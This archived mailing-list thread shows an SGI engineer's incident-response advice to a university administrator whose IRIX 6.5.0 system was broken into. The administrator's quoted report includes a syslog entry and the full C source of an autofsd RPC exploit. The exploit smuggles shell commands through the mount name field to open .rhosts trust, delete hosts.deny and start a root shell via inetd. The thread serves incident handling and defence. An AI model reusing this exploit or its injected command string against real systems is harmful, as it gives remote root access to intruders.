Re: Hacker doesn't take a break IRIS 6.5.0

From: Alexander Icasiano (alexi@sgi.com)
Date: Wed Jan 05 2000 - 12:59:36 PST


Hello,

If there has been a security breach on your SGI system, it will be in
your best interest to follow your sites security policy and contact your
sites security response team. (Most computer security response teams are
listed on http://www.first.org/). Your security team will probably
contact local law enforcement authorities, including the police and FBI,
and report this incident to CERT (http://www.cert.org/) for coordination
to
see if there are other similar attacks at other sites. SGI will
coordinate with CERT and assist law enforcement while they investigate any
crime. Make sure you get copies of the police report for insurance claims
(loss of business, theft of property, etc...)

SGI recommends that the system be unplugged from the network and full
verified backups be performed of the system and all disks. Law
enforecement may want copies of the backups and hard copy printouts of the
logs to be used for the investigation and possibly as evidence in a court
of law. After the backups have been verified, then all disks should be
wiped to remove any trojans or backdoors from the system. The system
should be reloaded with the current recommended/required
(http://support.sgi.com/
or ftp://patches.sgi.com/) and security patchsets
(http://www.sgi.com/Support/security/ or ftp://sgigate.sgi.com/patches/).
Before the system is placed back on the network, it should be secured
according to your local site security policy.

Infomation on how to backup, secure and audit your machine can be found
in the IRIX Advance Site and Server Administration guide online in
insight or on the web:
http://techpubs.sgi.com/library/tpl/cgi-bin/browse.cgi?coll=0650&db=bks&cmd=toc&pth=/SGI_Admin/IA_BakSecAcc

Since there is a high probability that the hackers have installed
backdoors and trojan horse programs, you cannot trust basic unix command
on
the compromised system like: ls, ps, su, etc, so the machine must be
backed up and wiped then reloaded with a fresh install of the operating
system in order to bring the system to a known state. When recovering from
backups, only restore data. No binaries, libraries, or executables since
there might be trojans or backdoors.

I am not sure what your site security policy states, but at most of the
secure customer sites I work with have a site security policy that states
disabling NFS on untrsuted networks which includes autofsd/automountd. NFS
can be spoofed because it assumes a trusted network. Too much of the
authenication and control channels are in cleartext similar to telnet,
ftp, or the r-commands like rlogin, rsh, etc... NFS uses RPC which assumes
host based authenication by IP address which is considered weak form of
authentication. Many secure sites move to alternative file sharing
protocols which are considered more secure on untrsuted networks like AFS,
etc... but it depends on your site security policy.

We are investigating the autofsd security issue. For now it is best to
assume autofsd is vulnerable and follow you site security policy which may
dictate you to disable the service or switch to automountd, or switch to
another file sharing protocol, or even place the service behind a firewall
to form a trusted network.

Alex

On Dec 31, 3:04pm, Yiu-Fai Lam wrote:
> Subject: Hacker doesn't take a break IRIS 6.5.0
> Dear Folks,
> ATTENTION:
>
> Sorry to find out during the Christmas break that hacker broke in my
> system, running IRIS 6.5.0 .
> Apparently, a .rhosts file was created "+ + " and new users accounts
> were set up with no passwords and with the power as root.
> in SYSLOG shows that once the rhosts was created, the hackers entered
> via the illegal accounts and installed an unkown number of sniff
> programs in my system disks.
> They created folders : afs_iris and nn , inwhich the are sniff programs
> to spring to other sites.
>
>
> The following attachement gave you some trace of what they did.
> While I am trying to get more export helps, please let me know if you
> have any comment or experience similar attacks during the same period of
> time.
> Appreciate any help you are willing to share,
>
> Well, what a way to spend the New Year Eve before the Y2K!
>
> Sincerely,
> Yiu-fai Lam
>
> ====================================
> Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' >
> /.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root
> /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob failed
>
>
>
> Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as
> whatever
>
>
> Dec 31 01:18:53 6E:xyz login[45746]:
> ?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
>
>
> Dec 31 01:22:39 6E:xyz login[37947]:
> ?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
> =========================================================================
>
> Hacker installed a sniffer as afs-irix
>
> total 248
> 40 -rwxr-xr-x 1 root sys 18260 Dec 29 00:26 aa
> 40 -rwxr-xr-x 1 root sys 18668 Dec 29 00:19 amd
> 8 -rw-r--r-- 1 root sys 2759 Dec 29 00:19 autofs.c
> 152 -rw-r--r-- 1 root sys 74952 Dec 31 11:44 core
> 8 -rw-r--r-- 1 root sys 1433 Dec 31 11:44 jig
> 0 -rw------- 1 root sys 0 Dec 31 01:20 nohup.out
> ===========================================================
>
> # more autofs.c
> #include <sys/types.h>
> #include <sys/time.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <fcntl.h>
> #include <stdlib.h>
> #include <errno.h>
> #include <string.h>
> #include <netdb.h>
> #include <rpc/rpc.h>
> #include <rpc/xdr.h>
> #include <signal.h>
>
> #define AUTOFS_PROG ((u_long)100099)
> #define AUTOFS_VERS ((u_long)1)
> #define AUTOFS_MOUNT ((u_long)1)
>
> #define AT 8
> #define A_MAXNAME 255
> #define A_MAXOPTS 255
> #define A_MAXPATH 1024
>
> struct mntrequest {
> char *name; /* name to be looked up */
> char *map; /* map to use */
> char *opts; /* default options */
> char *path; /* mountpoint to use */
> };
>
> struct mntres {
> int status; /* 0=OK, otherwise an errno from <sys/errno.h>
> */
> };
>
> bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
> if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
> if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
> if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
> if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
> return (TRUE);
> }
> void signal_handler(void) {
> exit(0);
> }
> bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
> if (!xdr_int(xdrs, &objp->status)) return (FALSE);
> return (TRUE);
> }
>
> main(int argc, char **argv){
>
> CLIENT *cl;
> struct mntrequest mntreq;
> struct mntres *res;
> struct sockaddr_in target;
> struct hostent *hp;
> struct timeval tm;
> char *host;
> enum clnt_stat stat;
> FILE *jackfrost;
>
>
> int sd;
>
> signal(SIGALRM, signal_handler);
>
> alarm(AT);
> host=argv[1];
>
> if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
> if ((hp = gethostbyname(host)) == NULL) {
> printf("%s: cannot resolve\n", host);
> exit(1);
> } else
> target.sin_addr.s_addr = *(u_long *)hp->h_addr;
> }
> target.sin_family=AF_INET;
> target.sin_port=0;
>
> sd=RPC_ANYSOCK;
> tm.tv_sec=8;
>
> tm.tv_usec=0;
> if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
> {
> clnt_pcreateerror("clnt_create");
> exit(0);
> }
> cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
> tm.tv_sec = 25;
>
> mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo
> \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd
> /tmp/bob";
> mntreq.map="/bin/true";
> mntreq.path="/hosts";
> mntreq.opts="";
> bzero((char *)&res, sizeof(res));
>
> if ((stat = clnt_call(cl, AUTOFS_MOUNT,
> (xdrproc_t)xdr_mntrequest,&mntreq,
> (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
> clnt_perror(cl, "clnt_call");
> exit(1);
> }
>
> jackfrost = fopen("jig", "a");
> if ( (int)jackfrost > 0 ) {
> fprintf(jackfrost, "%s\n", argv[1]);
> fclose(jackfrost);
> }
> clnt_destroy(cl);
> }
>
> ===================================================
>
>
> --
> Yiu-fai Lam
> NMR Lab. University of Maryland, Bldg #91
> Chemistry & Biochemistry Department, College Park, MD 20742.
> Phone: 301-405-1869 (Voice-mail), Labs: 405-1870 or 405-8559
> Fax : 301-314-9121 E-mail: YL2@UMAIL.UMD.EDU
> WEB: http://oxynmr.umd.edu
>
>-- End of excerpt from Yiu-Fai Lam

-- 
- Alex Icasiano alexi@sgi.com PGP Key @ http://reality.sgi.com/alexi -
----------------------------------------------------------------------
Random Fortune:

"Life is like a buffet; it's not good but there's plenty of it."



This archive was generated by hypermail 2b29 : Sun Dec 31 2000 - 01:15:01 PST